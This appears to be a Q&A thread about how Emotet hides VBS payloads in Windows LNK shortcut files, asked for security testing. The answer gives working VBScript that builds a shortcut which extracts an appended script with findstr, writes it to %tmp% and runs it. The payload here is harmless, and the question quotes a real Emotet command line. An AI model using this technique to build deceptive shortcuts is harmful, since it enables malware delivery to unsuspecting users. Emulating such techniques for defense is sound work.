There has been a rise in the use of LNK shortcut files to deliver malware, in particular Emotet. Within the LNK file is a payload (usually a VBS script) that is found with findstr.exe
. The payload is saved to a file and then run. For example, findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”
Security researchers say it is possible to append data to a LNK file without disrupting its functionality. So in the case of Emotet, a VBS script is being appended. I am attempting to create a benign LNK file that would mimic Emotet's activity.
How are these threat actors appending data to LNK shortcut files? I have crafted my own LNK file with PowerShell that simply opens calc.exe
. With the use of a hex editor I attempted to add a simple script, but to no avail.
EDIT: To clarify, I work for a cyber security company and am trying to test my company's security posture through emulating this type of activity.
My question is based off the following article - Rise of LNK Shortcut Files
It looks like you can append any data you want to a .lnk file and Windows does not care. That being said, the .lnk binary file format is documented and you can embed custom datablocks if you really want the .lnk file to follow the spec. To do that it helps to use C or some other language that supports COM. Here I'm just using VBScript to generate the .lnk for simplicity.
GenerateLnk.vbs:
Set WShell = WScript.CreateObject("WScript.Shell")
Set FSO = WScript.CreateObject("Scripting.FileSystemObject")
lnkfilename = "SO_Vir_Test.lnk"
set lnk = WShell.CreateShortcut(FSO.BuildPath(FSO.GetParentFolderName(WScript.ScriptFullName), lnkfilename))
lnk.TargetPath = FSO.BuildPath(WShell.ExpandEnvironmentStrings("%windir%"), "system32\cmd.exe")
lnk.IconLocation = "shell32.dll,1" ' Why not :)
magic = "Ev1LStArTsH3re"
lnk.Arguments = "/C findstr """+magic+".*"" """+lnkfilename+""" > ""%tmp%\Evil.vbs""&wscript ""%tmp%\Evil.vbs"""
lnk.Save
WShell.Exec("cmd.exe /C >>"""+lnk+""" echo.") ' Newline to separate the script from the lnk data, otherwise findstr will include binary junk
WScript.Sleep(500) ' Hack to wait for the previous command, I'm sure there is a better way
WShell.Exec("cmd.exe /C >>"""+lnk+""" echo "+magic+"=1::on error resume next::WScript.Echo(""Hello World"")::WScript.Quit(0)")
Paste the code into a .vbs file and execute it to generate a .lnk shortcut. When you execute this shortcut it will launch cmd.exe and cmd.exe will execute findstr "Ev1LStArTsH3re.*" "SO_Vir_Test.lnk" > "%tmp%\Evil.vbs"&wscript "%tmp%\Evil.vbs"
. Breaking this down, findstr
will find the line that starts with our magic (Ev1LStArTsH3re
) inside the .lnk and output that line to stdout. We have redirected stdout to a .vbs file in %temp%. After findstr
is done we simply execute the .vbs file we just created. This .vbs file will just show a MessageBox
but you could make it do something evil instead.
The big flaw with this exploit is that the user cannot rename the .lnk file before executing it! If the user renames the .lnk the findstr
will fail and the whole thing falls flat on its face.
The other two examples in the McAfee blog you linked to simply executes some Powershell command and don't really do anything unusual with the .lnk file.